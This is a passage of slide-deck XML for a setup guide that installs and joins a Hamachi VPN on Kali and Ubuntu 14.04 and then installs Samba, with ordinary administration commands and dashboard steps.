              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto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29"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2770350" y="1558300"/>
            <a:ext cx="3530400" cy="194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343" name="Google Shape;343;p29"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2806800" y="1757550"/>
            <a:ext cx="3457500" cy="142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sz="2200">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Kali &amp; Ubuntu</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="es" sz="2200">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> Server Setup</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="220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0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="2654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Hamachi VPN Setup (Kali and Ubuntu 14.04)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="349" name="Google Shape;349;p30"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="142150" y="1188375"/>
            <a:ext cx="5766349" cy="3391575"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="350" name="Google Shape;350;p30"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6045150" y="1004100"/>
            <a:ext cx="2885700" cy="24165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lang="es" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>We can download the hamachi debian package on the website and use dpkg to install it.</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es" sz="1500" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://www.vpn.net/linux</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>It is advised to download the 64-bit deb package when working on kali 2021.1.</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="351" name="Google Shape;351;p30"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6116846" y="3420596"/>
            <a:ext cx="2649925" cy="1513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1"/>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lt1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Adding hosts to the hamachi network</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="357" name="Google Shape;357;p31"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="361950" y="1366838"/>
            <a:ext cx="8420100" cy="2409825"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="358" name="Google Shape;358;p31"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="594275" y="4047175"/>
            <a:ext cx="7653900" cy="6465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1000"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>To start using hamachi after installation, we have to first login, then we have to join a network created by someone with a valid email address.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="359" name="Google Shape;359;p31"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3514400" y="2817650"/>
            <a:ext cx="4590300" cy="7746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lang="es" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>$ sudo hamachi login</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>$ sudo hamachi attach &lt;email&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>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2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="347425"/>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Adding hosts to the hamachi network</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="365" name="Google Shape;365;p32"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="460175" y="923100"/>
            <a:ext cx="8052326" cy="3297300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="366" name="Google Shape;366;p32"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="573775" y="4252100"/>
            <a:ext cx="7653900" cy="6465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1000"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>If you have an existing account and ran the 2 commands before, there will be a notification in the “My Network tab“ on regarding the pending join request.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="367" name="Google Shape;367;p32"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3114775" y="3636500"/>
            <a:ext cx="5655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Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Dashboard Link: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://secure.logmein.com/central/Central.aspx</a:t>
            </a:r>
            <a:endParaRPr>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Adding hosts to the hamachi network</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="373" name="Google Shape;373;p33"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="1403550"/>
            <a:ext cx="8839201" cy="1838516"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="374" name="Google Shape;374;p33"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="573775" y="4252100"/>
            <a:ext cx="7653900" cy="4155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1000"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>We can either accept or reject this request by clicking on it and hitting “Save”.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4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="477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2500"/>
              <a:t>Adding hosts to the hamachi network</a:t>
            </a:r>
            <a:endParaRPr sz="2500"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="380" name="Google Shape;380;p34"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1151251" y="2295099"/>
            <a:ext cx="3925424" cy="1208675"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="381" name="Google Shape;381;p34"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="253200" y="3639500"/>
            <a:ext cx="5505048" cy="1308725"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="382" name="Google Shape;382;p34"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2619350" y="3321850"/>
            <a:ext cx="884700" cy="606600"/>
          </a:xfrm>
          <a:prstGeom prst="downArrow">
            <a:avLst>
              <a:gd fmla="val 50000" name="adj1"/>
              <a:gd fmla="val 50000" name="adj2"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF6B6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4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5819750" y="1049788"/>
            <a:ext cx="3242100" cy="36993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lang="es" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>We can then proceed to create a new network and if we have already done so, we can use the “Networks” tab to select the network we wish to add the client to.</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Thereafter, returning to the main dashboard, there should be a list of all the clients in the network (green besides the name indicates online and red is offline)</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="384" name="Google Shape;384;p34"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="14478" r="0" t="10785"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="544350"/>
            <a:ext cx="5256202" cy="1706375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="385" name="Google Shape;385;p34"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="2298573">
            <a:off x="4284067" y="1910749"/>
            <a:ext cx="659128" cy="659549"/>
          </a:xfrm>
          <a:prstGeom prst="downArrow">
            <a:avLst>
              <a:gd fmla="val 50000" name="adj1"/>
              <a:gd fmla="val 50000" name="adj2"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF6B6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5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="3141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Testing connectivity </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es"/>
              <a:t>to the hamachi network</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="391" name="Google Shape;391;p35"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="239975" y="1084150"/>
            <a:ext cx="5588933" cy="3917950"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="392" name="Google Shape;392;p35"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5819750" y="1049788"/>
            <a:ext cx="3242100" cy="21858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lang="es" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>We can test connectivity to the other machines on the network by pinging them, or get a list using the command below:</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>$ sudo hamachi list</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>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6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="4132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Installing Samba on Ubuntu 14.04</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="398" name="Google Shape;398;p36"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="1228013"/>
            <a:ext cx="8839199" cy="2687467"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="399" name="Google Shape;399;p36"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="227975" y="4004475"/>
            <a:ext cx="8604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Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>* </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Samba must be installed during the setup of the Ubuntu virtual machine.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>If it is manually installed using apt  </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="es" u="sng">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>after</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
